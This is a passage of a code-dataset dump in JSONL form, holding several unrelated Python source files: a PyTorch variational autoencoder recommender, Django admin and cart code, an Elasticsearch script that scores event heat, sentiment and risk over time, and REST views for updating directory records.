main()\n","repo_name":"AlonSpinner/ConcurrentProgramming","sub_path":"threading/11/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":606,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"9937139102","text":"\"\"\"\nDawen Liang et al., Variational Autoencoders for Collaborative Filtering. WWW 2018.\nhttps://arxiv.org/pdf/1802.05814\n\"\"\"\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport numpy as np\n\nfrom .BaseModel import BaseModel\nfrom data.generators import MatrixGenerator\n\nclass MultVAE(BaseModel):\n def __init__(self, dataset, hparams, device):\n super(MultVAE, self).__init__()\n self.num_users = dataset.num_users\n self.num_items = dataset.num_items\n \n if isinstance(hparams['enc_dims'], str):\n hparams['enc_dims'] = eval(hparams['enc_dims'])\n self.enc_dims = [self.num_items] + list(hparams['enc_dims'])\n self.dec_dims = self.enc_dims[::-1]\n self.dims = self.enc_dims + self.dec_dims[1:]\n\n self.total_anneal_steps = hparams['total_anneal_steps']\n self.anneal_cap = hparams['anneal_cap']\n\n self.dropout = hparams['dropout']\n\n self.eps = 1e-6\n self.anneal = 0.\n self.update_count = 0\n\n self.device = device\n\n self.encoder = nn.ModuleList()\n for i, (d_in, d_out) in enumerate(zip(self.enc_dims[:-1], self.enc_dims[1:])):\n if i == len(self.enc_dims[:-1]) - 1:\n d_out *= 2\n self.encoder.append(nn.Linear(d_in, d_out))\n if i != len(self.enc_dims[:-1]) - 1:\n self.encoder.append(nn.Tanh())\n\n self.decoder = nn.ModuleList()\n for i, (d_in, d_out) in enumerate(zip(self.dec_dims[:-1], self.dec_dims[1:])):\n self.decoder.append(nn.Linear(d_in, d_out))\n if i != len(self.dec_dims[:-1]) - 1:\n self.decoder.append(nn.Tanh())\n\n self.to(self.device)\n\n self.optimizer = torch.optim.Adam(self.parameters(), lr=0.001)\n\n def forward(self, rating_matrix):\n # encoder\n h = F.dropout(F.normalize(rating_matrix), p=self.dropout, training=self.training)\n for layer in self.encoder:\n h = layer(h)\n\n # sample\n mu_q = h[:, :self.enc_dims[-1]]\n logvar_q = h[:, self.enc_dims[-1]:] # log sigmod^2 batch x 200\n std_q = torch.exp(0.5 * logvar_q) # sigmod batch x 200\n\n epsilon = torch.zeros_like(std_q).normal_(mean=0, std=0.01)\n sampled_z = mu_q + self.training * epsilon * std_q\n\n output = sampled_z\n for layer in self.decoder:\n output = layer(output)\n\n if self.training:\n kl_loss = ((0.5 * (-logvar_q + torch.exp(logvar_q) + torch.pow(mu_q, 2) - 1)).sum(1)).mean()\n return output, kl_loss\n else:\n return output\n\n def fit(self, dataset, exp_config, evaluator=None, early_stop=None, loggers=None):\n # user, item, rating pairs\n train_matrix = dataset.train_data\n\n num_training = train_matrix.shape[0]\n num_batches = int(np.ceil(num_training / exp_config.batch_size))\n\n batch_generator = MatrixGenerator(train_matrix, batch_size=exp_config.batch_size, shuffle=True, device=self.device)\n \n for epoch in range(1, exp_config.num_epochs + 1):\n self.train()\n epoch_loss = 0.0\n for b, batch_matrix in enumerate(batch_generator):\n self.optimizer.zero_grad()\n\n if self.total_anneal_steps > 0:\n self.anneal = min(self.anneal_cap, 1. * self.update_count / self.total_anneal_steps)\n else:\n self.anneal = self.anneal_cap\n\n pred_matrix, kl_loss = self.forward(batch_matrix)\n\n # cross_entropy\n ce_loss = F.binary_cross_entropy_with_logits(pred_matrix, batch_matrix, reduction='none').sum(1).mean()\n batch_loss = ce_loss + kl_loss * self.anneal\n batch_loss.backward()\n self.optimizer.step()\n\n self.update_count += 1\n\n epoch_loss += batch_loss\n\n if exp_config.verbose and b % 50 == 0:\n print('(%3d / %3d) loss = %.4f' % (b, num_batches, batch_loss))\n \n epoch_summary = {'loss': epoch_loss}\n \n # Evaluate if necessary\n if evaluator is not None and epoch >= exp_config.test_from and epoch % exp_config.test_step == 0:\n scores = evaluator.evaluate(self)\n epoch_summary.update(scores)\n \n if loggers is not None:\n for logger in loggers:\n logger.log_metrics(epoch_summary, epoch=epoch)\n \n ## Check early stop\n if early_stop is not None:\n is_update, should_stop = early_stop.step(scores, epoch)\n if should_stop:\n break\n else:\n if loggers is not None:\n for logger in loggers:\n logger.log_metrics(epoch_summary, epoch=epoch)\n\n best_score = early_stop.best_score if early_stop is not None else scores\n return {'scores': best_score}\n\n def predict(self, eval_users, eval_pos, test_batch_size):\n with torch.no_grad():\n input_matrix = torch.FloatTensor(eval_pos.toarray()).to(self.device)\n preds = np.zeros(eval_pos.shape)\n\n num_data = input_matrix.shape[0]\n num_batches = int(np.ceil(num_data / test_batch_size))\n perm = list(range(num_data))\n for b in range(num_batches):\n if (b + 1) * test_batch_size >= num_data:\n batch_idx = perm[b * test_batch_size:]\n else:\n batch_idx = perm[b * test_batch_size: (b + 1) * test_batch_size]\n test_batch_matrix = input_matrix[batch_idx]\n batch_pred_matrix = self.forward(test_batch_matrix)\n preds[batch_idx] = batch_pred_matrix.detach().cpu().numpy()\n \n preds[eval_pos.nonzero()] = float('-inf')\n\n return preds","repo_name":"yoongi0428/RecSys_PyTorch","sub_path":"models/MultVAE.py","file_name":"MultVAE.py","file_ext":"py","file_size_in_byte":5994,"program_lang":"python","lang":"en","doc_type":"code","stars":136,"dataset":"github-code","pt":"76"} +{"seq_id":"1272132552","text":"from django.db import models as dbModels\nfrom django.contrib import admin\nfrom django.contrib.auth.admin import UserAdmin as DjangoUserAdmin\nfrom django.utils.translation import ugettext_lazy as _\nfrom martor.widgets import AdminMartorWidget\nfrom tempus_dominus.widgets import DateTimePicker\n\nfrom .models import CustomUser, NewsModel, FaqModel, PuzzleInfo, Challenge, ChallengeFile, Metric, Submission, Score, \\\n Group\n\nfrom django.apps import apps\nfrom .models import CustomUser\n\n\nmodels = apps.get_models()\n\n\n@admin.register(CustomUser)\nclass UserAdmin(DjangoUserAdmin):\n \"\"\"Define admin model for custom User model with no email field.\"\"\"\n\n fieldsets = (\n (None, {'fields': ('email', 'password', 'first_name', 'last_name', \"email_confirmed\", \"is_authorised\", \"is_disabled\")}),\n # (_('Personal info'), {'fields': ('first_name', 'last_name')}),\n (_('Permissions'), {'fields': ('is_active', 'is_staff', 'is_superuser',\n 'groups', 'user_permissions')}),\n (_('Important dates'), {'fields': ('last_login', 'date_joined')}),\n )\n add_fieldsets = (\n (None, {\n 'classes': ('wide',),\n 'fields': ('email', 'password1', 'password2'),\n }),\n )\n list_display = ('email', 'first_name', 'last_name', 'is_staff', \"email_confirmed\", \"is_authorised\", \"is_disabled\")\n search_fields = ('email', 'first_name', 'last_name', \"email_confirmed\", \"is_authorised\", \"is_disabled\")\n ordering = ('email',)\n\n\nclass MarkdownModelAdmin(admin.ModelAdmin):\n formfield_overrides = {\n dbModels.TextField: {'widget': AdminMartorWidget},\n }\n\nadmin.site.register(NewsModel, MarkdownModelAdmin)\nadmin.site.register(FaqModel, MarkdownModelAdmin)\nadmin.site.register(PuzzleInfo)\nadmin.site.register(Challenge)\nadmin.site.register(ChallengeFile)\nadmin.site.register(Metric)\nadmin.site.register(Submission)\nadmin.site.register(Score)\nadmin.site.register(Group)\n","repo_name":"whinyadventure/RNA-Puzzles","sub_path":"RNAPuzzles/rnapuzzles/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1960,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"32879350172","text":"# -*- coding: utf-8 -*-\r\n\r\nimport time\r\nimport json\r\nimport codecs\r\n\r\nfrom collections import defaultdict\r\nfrom collections import OrderedDict\r\nfrom elasticsearch import Elasticsearch\r\n\r\nfrom get_user_name_type_by_uid import get_name_and_type\r\n\r\n\r\n# global variables\r\ntime_slice = 21600 # 21600s = 6h, interval length for X axis 86400 = 1 day\r\nes = Elasticsearch(['219.224.134.226:9209'])\r\nparameter_for_heat_index = [0.2, 0.4, 0.4] # paras can be changed\r\nparameter_for_risk_index = [0.2, 0.4, 0.4]\r\ntimeout = 15\r\n\r\n\r\ndef initialization(event_name):\r\n '''\r\n get start timestamp and end timestamp\r\n used as global vars\r\n '''\r\n\r\n global start_timestamp\r\n global end_timestamp\r\n\r\n query_body = {\r\n \"size\": 0,\r\n \"query\": {\r\n \"filtered\": {\r\n \"filter\": {\r\n \"term\": {\r\n \"message_type\": 1\r\n }\r\n }\r\n }\r\n },\r\n \"aggregations\": {\r\n \"time_slice\": {\r\n \"histogram\": {\r\n \"field\": \"timestamp\",\r\n \"interval\": time_slice, # global var\r\n \"min_doc_count\": 0\r\n\r\n }\r\n }\r\n }\r\n }\r\n response = es.search(\r\n index = event_name,\r\n doc_type = \"text\",\r\n body = query_body,\r\n timeout = timeout)\r\n start_timestamp = response[\"aggregations\"][\"time_slice\"][\"buckets\"][0][\"key\"]\r\n end_timestamp = response[\"aggregations\"][\"time_slice\"][\"buckets\"][-1][\"key\"]\r\n\r\n\r\ndef heat_curve(event_name):\r\n\r\n # local vars\r\n field_name = \"message_type\"\r\n\r\n # get query results\r\n origin_response = query(event_name, field_name, 1)\r\n comment_response = query(event_name, field_name, 2)\r\n forward_response = query(event_name, field_name, 3)\r\n\r\n # get elements for X axis (in list)\r\n datetime_list = construct_X_axis(origin_response)\r\n\r\n # get statistical data for origin, comment & forward (in list)\r\n origin_count_list = count_in_each_interval(origin_response)\r\n comment_count_list = count_in_each_interval(comment_response)\r\n forward_count_list = count_in_each_interval(forward_response)\r\n\r\n # get heat index (in list)\r\n heat_index_list = calculate_heat_index(origin_count_list, comment_count_list,\r\n forward_count_list, parameter_for_heat_index)\r\n\r\n result_list_for_frontend = generate_heat_result_list(heat_index_list, origin_count_list,\r\n comment_count_list, forward_count_list)\r\n\r\n return heat_index_list, datetime_list, result_list_for_frontend\r\n\r\n\r\ndef emotion_curve(event_name):\r\n\r\n # local vars\r\n field_name = \"sentiment\"\r\n\r\n positive_response = query(event_name, field_name, 1)\r\n negative_response = query(event_name, field_name, 3)\r\n\r\n positive_count_list = count_in_each_interval(positive_response)\r\n negative_count_list = count_in_each_interval(negative_response)\r\n\r\n positive_percentage, negative_percentage, vertical_axis = \\\r\n calculate_percentage(positive_count_list, negative_count_list)\r\n\r\n result_list_for_frontend = generate_emotion_result_list(positive_percentage,\r\n negative_percentage, vertical_axis)\r\n\r\n return negative_percentage, result_list_for_frontend\r\n\r\n\r\ndef risk_evolution_curve(event_name, heat_index_list, negative_percentage):\r\n\r\n # get max sensitive value in each interval\r\n query_body = {\r\n \"size\": 0,\r\n \"aggs\": {\r\n \"time_slice\": {\r\n \"histogram\": {\r\n \"field\": \"timestamp\",\r\n \"interval\": time_slice,\r\n \"min_doc_count\": 0,\r\n \"extended_bounds\": {\r\n \"min\": start_timestamp,\r\n \"max\": end_timestamp\r\n }\r\n },\r\n \"aggs\": {\r\n \"sensitive\": {\r\n \"avg\": {\r\n \"field\": \"sensitive\"\r\n }\r\n }\r\n }\r\n }\r\n }\r\n }\r\n response = es.search(\r\n index = event_name,\r\n doc_type = \"text\",\r\n body = query_body,\r\n timeout = timeout)\r\n\r\n sensitive_value_list = get_sensitive_value(response)\r\n\r\n risk_index_list = calculate_risk_index(heat_index_list, negative_percentage,\r\n sensitive_value_list, parameter_for_risk_index)\r\n\r\n result_list_for_frontend = generate_risk_result_list(risk_index_list, heat_index_list,\r\n negative_percentage, sensitive_value_list)\r\n\r\n return result_list_for_frontend\r\n\r\n\r\ndef key_user_identification(event_name):\r\n\r\n query_body = {\r\n \"size\": 0,\r\n \"query\": {\r\n \"filtered\": {\r\n \"filter\": {\r\n \"terms\": {\r\n \"message_type\": [2,3]\r\n }\r\n }\r\n }\r\n },\r\n \"aggs\": {\r\n \"time_slice\": {\r\n \"histogram\": {\r\n \"field\": \"timestamp\",\r\n \"interval\": time_slice,\r\n \"min_doc_count\": 0,\r\n \"extended_bounds\": {\r\n \"min\": start_timestamp,\r\n \"max\": end_timestamp\r\n }\r\n },\r\n \"aggs\": {\r\n \"key_users\": {\r\n \"terms\": {\r\n \"field\": \"root_uid\",\r\n \"size\": 10\r\n }\r\n }\r\n }\r\n }\r\n }\r\n }\r\n response = es.search(\r\n index = event_name,\r\n doc_type = \"text\",\r\n body = query_body,\r\n timeout = timeout)\r\n\r\n vertical_axis_list, key_users_list = get_vertical_axis_and_key_users(response)\r\n\r\n result_list_for_frontend = generate_key_users_result_list(vertical_axis_list, key_users_list)\r\n\r\n return result_list_for_frontend\r\n\r\n\r\ndef risk_details(event_name):\r\n\r\n query_body = { # 返回6小时内全部mid\r\n \"size\": 0,\r\n \"query\": {\r\n \"match_all\": {}\r\n },\r\n \"aggs\": {\r\n \"time_slice\": {\r\n \"histogram\": {\r\n \"field\": \"timestamp\",\r\n \"interval\": time_slice,\r\n \"min_doc_count\": 0,\r\n \"extended_bounds\": {\r\n \"min\": start_timestamp,\r\n \"max\": end_timestamp\r\n }\r\n },\r\n \"aggs\": {\r\n \"key_users\": {\r\n \"terms\": {\r\n \"field\": \"mid\",\r\n \"size\": 30\r\n }\r\n }\r\n }\r\n }\r\n }\r\n }\r\n response = es.search(\r\n index = event_name,\r\n doc_type = \"text\",\r\n body = query_body,\r\n timeout = timeout)\r\n\r\n hot_post_list = get_hot_posts(event_name, response)\r\n\r\n # for i in range(len(hot_post_list)):\r\n # print hot_post_list[i]\r\n\r\n return hot_post_list\r\n\r\n\r\ndef query(event_name, field_name, value):\r\n\r\n query_body = {\r\n \"size\": 0,\r\n \"query\": {\r\n \"filtered\": {\r\n \"filter\": {\r\n \"term\": {\r\n field_name: value\r\n }\r\n }\r\n }\r\n },\r\n \"aggregations\": {\r\n \"time_slice\": {\r\n \"histogram\": {\r\n \"field\": \"timestamp\",\r\n \"interval\": time_slice, # global var\r\n \"min_doc_count\": 0,\r\n \"extended_bounds\": {\r\n \"min\": start_timestamp,\r\n \"max\": end_timestamp\r\n }\r\n }\r\n }\r\n }\r\n }\r\n response = es.search(\r\n index = event_name,\r\n doc_type = \"text\",\r\n body = query_body,\r\n timeout = timeout)\r\n\r\n return response\r\n\r\n\r\ndef construct_X_axis(origin_response):\r\n # 评论和转发一定发生在原创之后\r\n x_axis = []\r\n buckets = origin_response[\"aggregations\"][\"time_slice\"][\"buckets\"]\r\n\r\n for i in range(len(buckets)):\r\n x_axis.append(timestamp_to_date(buckets[i][\"key\"]))\r\n\r\n return x_axis\r\n\r\n\r\ndef timestamp_to_date(unix_time):\r\n format = '%m/%d %H:%M'\r\n\r\n value = time.localtime(unix_time)\r\n date = time.strftime(format, value)\r\n\r\n return date\r\n\r\n\r\ndef count_in_each_interval(response):\r\n counts = []\r\n buckets = response[\"aggregations\"][\"time_slice\"][\"buckets\"]\r\n\r\n for i in range(len(buckets)):\r\n counts.append(buckets[i][\"doc_count\"])\r\n\r\n return counts\r\n\r\n\r\ndef calculate_heat_index(origin_list, comment_list, forward_list, parameter_list):\r\n\r\n heat_index = []\r\n temp = []\r\n\r\n for i in range(len(origin_list)):\r\n index = round(parameter_list[0] * origin_list[i] + parameter_list[1] * comment_list[i] \\\r\n + parameter_list[2] * forward_list[i])\r\n temp.append(index)\r\n\r\n denominator = max(temp)\r\n\r\n for i in range(len(origin_list)):\r\n heat_index.append(int(round((temp[i] / denominator) * 100)))\r\n\r\n return heat_index\r\n\r\n\r\ndef generate_heat_result_list(heat_list, origin_list, comment_list, forward_list):\r\n result_list = []\r\n\r\n for i in range(len(heat_list)):\r\n d = {'heat': heat_list[i], 'origin': origin_list[i],\r\n 'comment': comment_list[i], 'forward': forward_list[i]}\r\n result_list.append(d)\r\n\r\n return result_list\r\n\r\n\r\ndef calculate_percentage(positive_list, negative_list):\r\n vertical_axis = []\r\n total = []\r\n negative_percentage = []\r\n positive_percentage = []\r\n\r\n for i in range(len(positive_list)):\r\n total.append(positive_list[i] + negative_list[i])\r\n\r\n for i in range(len(positive_list)):\r\n if negative_list[i] == 0 and positive_list[i] == 0:\r\n vertical_axis.append(0)\r\n positive_percentage.append(0)\r\n negative_percentage.append(0)\r\n\r\n elif negative_list[i] == 0 and positive_list[i] != 0:\r\n vertical_axis.append(0)\r\n positive_percentage.append(1)\r\n negative_percentage.append(0)\r\n\r\n elif negative_list[i] != 0 and positive_list[i] == 0:\r\n vertical_axis.append(1)\r\n positive_percentage.append(0)\r\n negative_percentage.append(1)\r\n\r\n else:\r\n negative_percentage.append(round((float(negative_list[i]) / total[i]), 2))\r\n positive_percentage.append(round((1 - negative_percentage[i]), 2))\r\n vertical_axis.append(round((negative_percentage[i] / positive_percentage[i]), 2))\r\n\r\n return positive_percentage, negative_percentage, vertical_axis\r\n\r\n\r\ndef generate_emotion_result_list(positive_percentage, negative_percentage, vertical_axis):\r\n result_list = []\r\n\r\n for i in range(len(positive_percentage)):\r\n negative_percentage[i] = int(negative_percentage[i] * 100)\r\n\r\n for i in range(len(positive_percentage)):\r\n positive_percentage[i] = int(positive_percentage[i] * 100) # float to int\r\n\r\n for i in range(len(positive_percentage)):\r\n d = {'positive': positive_percentage[i], 'negative': negative_percentage[i],\r\n 'vertical_axis': vertical_axis[i]}\r\n result_list.append(d)\r\n\r\n return result_list\r\n\r\n\r\ndef get_sensitive_value(sensitive_response):\r\n sensitive_value_list = []\r\n buckets = sensitive_response[\"aggregations\"][\"time_slice\"][\"buckets\"]\r\n\r\n for i in range(len(buckets)):\r\n if buckets[i][\"sensitive\"][\"value\"] != None:\r\n sensitive_value_list.append(int(round(buckets[i][\"sensitive\"][\"value\"])))\r\n else:\r\n sensitive_value_list.append(0)\r\n\r\n # map to 0-100\r\n denominator = float(max(sensitive_value_list))\r\n for i in range(len(buckets)):\r\n sensitive_value_list[i] = int(round((sensitive_value_list[i] / denominator) * 100))\r\n\r\n return sensitive_value_list\r\n\r\n\r\ndef calculate_risk_index(heat_list, emotion_list, sensitive_list, parameter_list):\r\n '''\r\n This function calculates risk index\r\n :param heat_list: heat index, range 0-100\r\n :param emotion_list: negative percent\r\n :param sensitive_list: sensitive value, range 0-100\r\n :return: risk index list, range 0-100\r\n '''\r\n temp = []\r\n risk_index_list = []\r\n\r\n for i in range(len(heat_list)):\r\n temp.append(parameter_list[0] * heat_list[i] + parameter_list[1] * emotion_list[i]\r\n + parameter_list[2] * sensitive_list[i])\r\n\r\n denominator = max(temp)\r\n\r\n for i in range(len(heat_list)):\r\n risk_index_list.append(int(round((temp[i] / denominator) * 100))) # map to 0-100\r\n\r\n return risk_index_list\r\n\r\n\r\ndef generate_risk_result_list(risk, heat, emotion, sensitive):\r\n result_list = []\r\n\r\n for i in range(len(risk)):\r\n d = {'risk_index': risk[i], 'heat_risk': heat[i],\r\n 'emotion_risk': emotion[i], 'sensitive_risk': sensitive[i]}\r\n result_list.append(d)\r\n\r\n return result_list\r\n\r\n\r\ndef get_vertical_axis_and_key_users(response):\r\n # 竖轴值表示某一时间段内 转发评论数的最大值 该值对应的用户是key_users列表中的第一个值\r\n key_users = []\r\n vertical_axis = []\r\n buckets = response[\"aggregations\"][\"time_slice\"][\"buckets\"]\r\n\r\n for i in range(len(buckets)):\r\n if buckets[i][\"key_users\"][\"buckets\"] == []:\r\n vertical_axis.append(0)\r\n key_users.append({\"key_users\": None})\r\n else:\r\n vertical_axis.append(buckets[i][\"key_users\"][\"buckets\"][0][\"doc_count\"])\r\n d = {}\r\n for j in range(len(buckets[i][\"key_users\"][\"buckets\"])):\r\n d.setdefault(\"key_users\", [])\r\n d[\"key_users\"].append(buckets[i][\"key_users\"][\"buckets\"][j][\"key\"])\r\n key_users.append(d)\r\n\r\n return vertical_axis, key_users\r\n\r\n\r\ndef generate_key_users_result_list(vertical_axis_list, key_users_list):\r\n result_list = []\r\n\r\n for i in range(len(vertical_axis_list)):\r\n d = {'max_num_of_comment_and_forward': vertical_axis_list[i],\r\n 'key_users_list': key_users_list[i]}\r\n result_list.append(d)\r\n\r\n return result_list\r\n\r\n\r\ndef get_hot_posts(event_name, response):\r\n\r\n result_list = []\r\n buckets = response[\"aggregations\"][\"time_slice\"][\"buckets\"] # len = 137\r\n\r\n for i in range(len(buckets)):\r\n\r\n temp = []\r\n for j in range(len(buckets[i][\"key_users\"][\"buckets\"])):\r\n d = {}\r\n num_of_comment = query_for_hot_posts(event_name, 2, buckets[i][\"key_users\"] \\\r\n [\"buckets\"][j][\"key\"], buckets[i][\"key\"])\r\n num_of_forward = query_for_hot_posts(event_name, 3, buckets[i][\"key_users\"] \\\r\n [\"buckets\"][j][\"key\"], buckets[i][\"key\"])\r\n total = num_of_comment + num_of_forward\r\n mid = buckets[i][\"key_users\"][\"buckets\"][j][\"key\"]\r\n d[\"mid\"] = mid\r\n d[\"total\"] = total\r\n d[\"comment\"] = num_of_comment\r\n d[\"forward\"] = num_of_forward\r\n d[\"timestamp\"] = buckets[i][\"key\"]\r\n d[\"type\"] = event_name\r\n temp.append(d)\r\n result_list.append(temp)\r\n\r\n return result_list\r\n\r\n\r\ndef query_for_hot_posts(event_name, message_type, mid, start_timestamp):\r\n\r\n query_body = {\r\n \"query\": {\r\n \"filtered\": {\r\n \"filter\": {\r\n \"bool\": {\r\n \"must\": [\r\n {\r\n \"term\": {\r\n \"message_type\": message_type\r\n }\r\n },\r\n {\r\n \"term\": {\r\n \"root_mid\": mid\r\n }\r\n },\r\n {\r\n \"range\": {\r\n \"timestamp\": {\r\n \"gte\": start_timestamp,\r\n \"lte\": start_timestamp + time_slice\r\n }\r\n }\r\n }\r\n ]\r\n }\r\n }\r\n }\r\n }\r\n }\r\n response = es.search(\r\n index = event_name,\r\n doc_type = \"text\",\r\n body = query_body,\r\n timeout = timeout)\r\n\r\n return response[\"hits\"][\"total\"]\r\n\r\n\r\ndef generate_table_for_curve(event_name, datetime, heat_result, emotion_result, risk_result, key_users):\r\n\r\n table_for_curve = []\r\n\r\n for i in range(len(datetime)):\r\n d = OrderedDict()\r\n d[\"type\"] = event_name\r\n d[\"datetime\"] = datetime[i]\r\n d[\"heat_index\"] = heat_result[i][\"heat\"]\r\n d[\"origin\"] = heat_result[i][\"origin\"]\r\n d[\"comment\"] = heat_result[i][\"comment\"]\r\n d[\"forward\"] = heat_result[i][\"forward\"]\r\n d[\"proportion\"] = emotion_result[i][\"vertical_axis\"]\r\n d[\"negative\"] = emotion_result[i][\"negative\"]\r\n d[\"positive\"] = emotion_result[i][\"positive\"]\r\n d[\"risk_index\"] = risk_result[i][\"risk_index\"]\r\n d[\"heat_risk\"] = risk_result[i][\"heat_risk\"]\r\n d[\"emotion_risk\"] = risk_result[i][\"emotion_risk\"]\r\n d[\"sensitive_risk\"] = risk_result[i][\"sensitive_risk\"]\r\n d[\"max_num_of_comment_and_forward\"] = key_users[i][\"max_num_of_comment_and_forward\"]\r\n d[\"key_users\"] = key_users[i][\"key_users_list\"][\"key_users\"]\r\n table_for_curve.append(d)\r\n\r\n return table_for_curve\r\n\r\n\r\ndef processing_flow(event_name): # main function that invokes other functions\r\n\r\n initialization(event_name)\r\n\r\n heat_index_list, datetime_list, heat_result = heat_curve(event_name)\r\n negative_percentage, emotion_result = emotion_curve(event_name)\r\n risk_result = risk_evolution_curve(event_name, heat_index_list, negative_percentage)\r\n key_user_result = key_user_identification(event_name) # uid-身份映射表先放一放 此模块待更新\r\n\r\n table_for_curve = generate_table_for_curve(event_name, datetime_list, heat_result,\r\n emotion_result, risk_result, key_user_result)\r\n\r\n hot_post_list = risk_details(event_name)\r\n\r\n return table_for_curve, hot_post_list\r\n\r\n\r\nif __name__ == '__main__':\r\n\r\n processing_flow(\"flow_text_gangdu\")","repo_name":"Ymm0008/GroupCode","sub_path":"group/group_event/evolution_analysis/risk_evolution_processing_module.py","file_name":"risk_evolution_processing_module.py","file_ext":"py","file_size_in_byte":18912,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"12514215449","text":"from __future__ import unicode_literals\nimport logging\n\nfrom rest_framework import generics, serializers, response, status\n\nfrom dcl_server.backends.generic import update_dcl_record, clear_dcl_record\nfrom dcl_server.oasis.constants import OASIS_PREFIX_PARTYID\nfrom dcl_server.oasis.utils import get_hash\n\nlogger = logging.getLogger(__name__)\n\n\nclass UpdateDclRecordSerializer(serializers.Serializer):\n capabilityPublisherUrl = serializers.CharField(required=True, max_length=1000)\n participantIdentifier = serializers.CharField(required=True, max_length=1024)\n participantIdentifierScheme = serializers.CharField(required=True, max_length=1024)\n\n def validate_participantIdentifierScheme(self, value): # NOQA\n if value != value.strip():\n raise serializers.ValidationError(\"You must not use trailing spaces in participant identifier scheme\")\n # The participant Identifier must meet the structural format\n # requirements of the identifier scheme.\n # The participant identifier scheme must be on the Council's list of\n # approved identifiers, as per the Policy on the use of business identifiers.\n if not value.startswith(OASIS_PREFIX_PARTYID):\n raise serializers.ValidationError(\"Unsupported scheme (ABN, GLN, DUNS and unregistered are supported)\")\n return value\n\n def validate(self, data):\n participant_id = None\n if 'participantIdentifier' in data and 'participantIdentifierScheme' in data:\n participant_id = \"{}::{}\".format(\n data['participantIdentifierScheme'],\n data['participantIdentifier']\n ).lower()\n if not participant_id:\n raise serializers.ValidationError(\"Can't determine ParticipantId to update\")\n data['participant_id'] = participant_id\n\n # user must have participant_id in his auth\n user_auth = getattr(self.context['request'], 'auth') or {}\n available_participant_ids = user_auth.get('participant_ids', [])\n if participant_id not in available_participant_ids:\n raise serializers.ValidationError(\n \"You don't have access to this ParticipantId\"\n )\n return data\n\n def save(self):\n new_value = self.validated_data['capabilityPublisherUrl']\n assert new_value\n\n logger.info(\n \"User %s with access based on %s tries to update record %s to value %s\",\n self.context['request'].user,\n self.validated_data.get('access_type'),\n self.validated_data.get('participant_id'),\n new_value\n )\n\n result = update_dcl_record(\n participant_id=self.validated_data['participant_id'],\n new_value=new_value,\n actor_party=self.validated_data.get('capabilityPublisherID'),\n actor_user=self.context['request'].user,\n )\n return result\n\n def get_response_data(self):\n return {\n \"hash\": \"b-{}\".format(get_hash(self.validated_data['participant_id']).lower())\n }\n\n\nclass UpdateDclRecordView(generics.CreateAPIView):\n \"\"\"\n Input format:\n {\n \"participantIdentifier\": \"51824753556\",\n \"participantIdentifierScheme\": \"urn:oasis:names:tc:ebcore:partyid-type:iso6523:0151\",\n \"capabilityPublisherUrl\": \"dcp.testpoint.io\"\n }\n \"\"\"\n\n def get_serializer_class(self):\n return UpdateDclRecordSerializer\n\n def create(self, request, *args, **kwargs):\n serializer = self.get_serializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n self.perform_create(serializer)\n headers = self.get_success_headers(serializer.data)\n return response.Response(\n serializer.get_response_data(),\n status=status.HTTP_201_CREATED,\n headers=headers\n )\n\n\nclass DeleteDclRecordView(generics.DestroyAPIView):\n\n def destroy(self, request, *args, **kwargs):\n participant_id = kwargs.get('participant_id')\n user_auth = getattr(request, 'auth', {}) or {}\n available_participant_ids = user_auth.get('participant_ids', [])\n if participant_id not in available_participant_ids:\n raise serializers.ValidationError(\n \"You don't have access to this ParticipantId\"\n )\n\n result = clear_dcl_record(participant_id)\n if result is True:\n return response.Response(status=status.HTTP_204_NO_CONTENT)\n else:\n return response.Response(\n {\n \"errors\": [\n {\n \"code\": \"DCL-X400\",\n \"name\": \"Record Update Problem\",\n \"userMessage\": (\n \"It was impossible to delete such resource \"\n \"(due it access problems or non-existance)\"\n )\n }\n ]\n },\n status=status.HTTP_400_BAD_REQUEST,\n )\n","repo_name":"test-point/testpoint-dcl","sub_path":"src-py/src/dcl_server/ausdigital_api_v0/views/update.py","file_name":"update.py","file_ext":"py","file_size_in_byte":5086,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"72304111287","text":"from ..database import names\nfrom .model import Model\n\n\nclass Zone(Model):\n database_name = names.ZONES\n\n def __init__(\n self,\n name=\"TCHAN\",\n begin=None,\n end=0\n ):\n super().__init__()\n self.name = name\n self.begin = begin\n self.end = end + 1\n\n @classmethod\n def by_name(cls, name):\n return cls(**cls.database().by_name(name))\n\n @classmethod\n def by_room_id(cls, room_id):\n if room_id > 0:\n return cls()\n return cls(**cls.database().by_room_id(room_id))\n\n def room_id(self, room_id):\n return 0 if self.begin is None else (-room_id) - self.begin\n","repo_name":"d2emon/worlds","sub_path":"worlds-server/walk/models/zone.py","file_name":"zone.py","file_ext":"py","file_size_in_byte":665,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"36141852040","text":"\"\"\"Реализация корзины..\"\"\"\n\nfrom decimal import Decimal\nfrom typing import Dict, List, Union\n\nfrom django.conf import settings\nfrom django.http.request import HttpRequest\n\nfrom store.models import Product\n\n\nclass Cart:\n def __init__(self, request: HttpRequest) -> None:\n \"\"\"Инициализация корзины..\"\"\"\n self.session = request.session\n cart = self.session.get(settings.CART_SESSION_ID)\n if not cart:\n # сохраняем пустую корзину в сессии\n cart = self.session[settings.CART_SESSION_ID] = {}\n self.cart: Dict[str, Union[int, str, Product]] = cart\n\n def __iter__(self):\n \"\"\"Итерация по элементам в корзине и получение продуктов из базы\n данных.\"\"\"\n\n product_ids = self.cart.keys()\n # получение объектов продуктов и добавление их в корзину\n products = Product.objects.filter(id__in=product_ids)\n cart = self.cart.copy()\n for product in products:\n cart[str(product.id)][\"product\"] = product\n for item in cart.values():\n item[\"price\"] = Decimal(item[\"price\"])\n item[\"total_price\"] = item[\"price\"] * item[\"quantity\"]\n yield item\n\n def __len__(self) -> int:\n \"\"\"Подсчет количества элементов в корзине.\"\"\"\n return sum(item[\"quantity\"] for item in self.cart.values())\n\n def add(\n self, product: Product, quantity: int = 1, override_quantity: bool = False\n ) -> None:\n \"\"\"Добавление продукта в корзину или обновление его количества.\"\"\"\n product_id = str(product.id)\n if product_id not in self.cart:\n 